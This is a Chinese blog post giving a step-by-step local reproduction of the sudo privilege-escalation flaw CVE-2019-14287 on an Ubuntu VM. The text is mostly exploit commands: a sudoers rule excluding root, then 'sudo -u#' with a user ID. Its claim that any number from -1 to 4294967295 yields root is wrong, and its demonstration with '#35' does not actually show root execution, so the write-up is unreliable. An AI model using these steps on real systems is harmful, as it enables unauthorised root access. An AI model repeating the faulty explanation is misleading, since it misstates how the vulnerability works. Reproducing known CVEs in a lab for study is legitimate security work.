首页 > 编程知识 正文

CVE漏洞sudo提权 CVE201914287 简单复现,cve漏洞复现

时间:2023-05-05 14:22:05 阅读:272059 作者:3876

CVE漏洞sudo提权 CVE-2019-14287 简单复现

背景
这一个sudo提权漏洞,是安全策略绕过问题,去执行某些敏感的命令。通过这个漏洞,可以使linux上的普通用户执行root权限的命令。
这个漏洞作用于sudo低于1.8.28的版本。、
#我在vm虚拟机ubuntu上进行实现的。

复现过程

1:查看自己的sudo版本
输入命令: sudo -V
(注意是大写的V)

2: 创建实验用户
输入命令: sudo adduser test
然后设置密码
3: 修改配置文件
输入命令: sudo vim /etc/sudoers
(注意vim前后的空格)
进入页面后,插入代码: test ALL=(ALL,!root)ALL
插入后,表示test用户可以使用sudo,除了root以外任意用户都可以去执行。
然后保存退出
4:切换到test用户,尝试需要root权限的命令。
输入命令: su test #进入test用户
然后尝试命令: sudo id 发现失败,没有足够的权限去执行。
然后再用漏洞中的办法: 输入sudo -u#数字 命令,其中数字范围为-1~4294967295,可以取任意数字。
即输入:sudo -u#35 id 发现可以执行。

复现成功!!

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。